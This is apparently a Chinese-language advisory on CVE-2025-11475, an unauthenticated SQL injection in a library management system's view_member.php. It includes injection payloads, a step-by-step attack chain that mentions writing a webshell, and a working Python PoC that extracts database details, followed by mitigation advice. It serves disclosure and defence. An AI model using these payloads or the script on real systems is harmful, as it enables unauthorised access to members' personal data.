CVE-2025-11475：Advanced Library Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11475

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Advanced Library Management System

漏洞概述

CVE-2025-11475是projectworlds Advanced Library Management System 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于系统的/view_member.php文件中，具体涉及对user_id参数的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句注入到该参数中，实现对后端数据库的未授权操作。

Advanced Library Management System（高级图书馆管理系统）是一款用于管理图书馆藏书、借阅记录和会员信息的Web应用程序。由于该系统在处理用户输入时未对参数进行充分的过滤和转义，导致攻击者能够利用SQL注入漏洞绕过身份验证机制，直接与数据库进行交互。

该漏洞的CVSS 3.1评分为7.3，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N）和用户交互（UI:N），表明该漏洞极易被远程攻击者利用。虽然该漏洞对机密性、完整性和可用性的影响均为低级，但攻击者仍然可以通过该漏洞获取敏感数据、篡改数据库内容或执行管理操作。

更值得关注的是，该漏洞的利用方式已被公开披露，这意味着任何潜在的攻击者都可以轻松获取利用代码并对存在漏洞的系统发起攻击。对于仍在使用受影响版本的图书馆管理系统而言，这一漏洞构成了严重的安全威胁。

技术细节

该SQL注入漏洞的根本原因在于/view_member.php文件中对user_id参数的处理未使用参数化查询或预编译语句，而是直接将用户输入拼接到SQL查询语句中执行。具体技术分析如下：

1. **注入点定位**：漏洞存在于/view_member.php文件的查询逻辑中，该文件用于显示会员详细信息。系统在获取会员信息时，通过GET或POST方式接收user_id参数，并将其直接嵌入到SQL查询中。

2. **注入原理**：由于缺少对用户输入的过滤和转义处理，攻击者可以在user_id参数中注入恶意SQL片段。例如，正常请求为view_member.php?user_id=1，而恶意请求可能为view_member.php?user_id=1' UNION SELECT 1,user(),database()-- -，从而通过UNION查询获取数据库中的敏感信息。

3. **利用方式**：攻击者可以通过构造布尔型盲注、时间型盲注或UNION联合查询等方式，逐步提取数据库中的用户名、密码哈希、个人信息等敏感数据。在某些情况下，还可以利用MySQL的INTO OUTFILE或LOAD_FILE()函数读取服务器文件或写入Webshell。

4. **攻击特征**：由于无需认证即可访问该接口（PR:N），攻击者可以直接远程发起攻击，无需拥有任何合法账户。同时，由于无需用户交互（UI:N），该漏洞可以被自动化工具大规模扫描和利用。

5. **影响范围**：该漏洞影响Advanced Library Management System 1.0版本的所有部署实例。由于该系统通常部署在教育机构或公共图书馆的服务器上，一旦被攻击，可能导致大量用户隐私数据泄露。

攻击链分析

STEP 1

步骤1：目标识别

攻击者通过搜索引擎（如Shodan、Google Dorks）或扫描工具识别运行Advanced Library Management System 1.0的Web服务器，确定目标系统的/view_member.php文件可访问。

STEP 2

步骤2：漏洞探测

攻击者向/view_member.php发送带有特殊构造的user_id参数（如添加单引号、UNION SELECT等），通过观察响应差异确认SQL注入漏洞的存在。

STEP 3

步骤3：信息收集

利用UNION联合查询或布尔/时间盲注技术，逐步提取数据库名称、当前用户、数据库版本、表名和列名等元数据信息。

STEP 4

步骤4：数据提取

获取管理员账户的凭据（用户名和密码哈希）、会员个人信息、借阅记录等敏感数据，可能导致大规模数据泄露。

STEP 5

步骤5：权限提升与持久化

利用获取的管理员凭据登录系统后台，或通过SQL注入写入Webshell，实现对服务器更深层次的持久控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11475 PoC - SQL Injection in view_member.php
# Target: projectworlds Advanced Library Management System 1.0
# Vulnerable parameter: user_id

import requests
import sys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com"
VULNERABLE_ENDPOINT = "/view_member.php"

def check_injection(url):
    """Check if the target is vulnerable to SQL injection"""
    # Normal request
    normal_payload = {"user_id": "1"}
    try:
        r_normal = requests.get(url + VULNERABLE_ENDPOINT, params=normal_payload, timeout=10)
        normal_length = len(r_normal.text)
    except Exception as e:
        print(f"[ERROR] Cannot connect to target: {e}")
        return False

    # Boolean-based injection test
    true_payload = {"user_id": "1' AND '1'='1"}
    false_payload = {"user_id": "1' AND '1'='2"}

    r_true = requests.get(url + VULNERABLE_ENDPOINT, params=true_payload, timeout=10)
    r_false = requests.get(url + VULNERABLE_ENDPOINT, params=false_payload, timeout=10)

    if len(r_true.text) != len(r_false.text) and len(r_true.text) == normal_length:
        print("[+] Target is vulnerable to SQL injection!")
        return True
    else:
        print("[-] Target does not appear to be vulnerable.")
        return False

def extract_data(url):
    """Extract database information using UNION-based injection"""
    # Determine number of columns
    for i in range(1, 20):
        cols = ",".join([str(x) for x in range(1, i+1)])
        payload = f"-1' UNION SELECT {cols}-- -"
        r = requests.get(url + VULNERABLE_ENDPOINT, params={"user_id": payload}, timeout=10)
        if "error" not in r.text.lower() and len(r.text) > 0:
            print(f"[+] Number of columns: {i}")
            num_cols = i
            break

    # Extract database name
    payload = f"-1' UNION SELECT {','.join(['NULL']*(num_cols-1))},database()-- -"
    r = requests.get(url + VULNERABLE_ENDPOINT, params={"user_id": payload}, timeout=10)
    print(f"[+] Database info retrieved. Check response for details.")

    # Extract current user
    payload = f"-1' UNION SELECT {','.join(['NULL']*(num_cols-1))},user()-- -"
    r = requests.get(url + VULNERABLE_ENDPOINT, params={"user_id": payload}, timeout=10)
    print(f"[+] User info retrieved. Check response for details.")

    # Extract table names
    payload = f"-1' UNION SELECT {','.join(['NULL']*(num_cols-1))},group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -"
    r = requests.get(url + VULNERABLE_ENDPOINT, params={"user_id": payload}, timeout=10)
    print(f"[+] Tables info retrieved. Check response for details.")

if __name__ == "__main__":
    print(f"[*] Testing CVE-2025-11475 against {TARGET_URL}")
    if check_injection(TARGET_URL):
        extract_data(TARGET_URL)

影响范围

projectworlds Advanced Library Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web服务器配置限制对/view_member.php文件的直接访问；2）部署WAF规则过滤包含SQL关键字（如UNION、SELECT、OR、AND等）的恶意请求；3）暂时禁用该文件的相关功能或将其从Web根目录移除；4）监控数据库日志，检测异常的SQL查询行为；5）对数据库中存储的敏感信息进行加密，降低数据泄露的影响。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11475
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11475
3 Details https://www.cvedetails.com/cve/CVE-2025-11475/
4 VulDB https://vuldb.com/cve/CVE-2025-11475
5 Link https://github.com/ChenGuangHuangHun/CVE/issues/4
6 Link https://vuldb.com/?ctiid.327593
7 Link https://vuldb.com/?id.327593
8 Link https://vuldb.com/?submit.667107
9 Link https://vuldb.com/?submit.703085
10 Link https://github.com/ChenGuangHuangHun/CVE/issues/4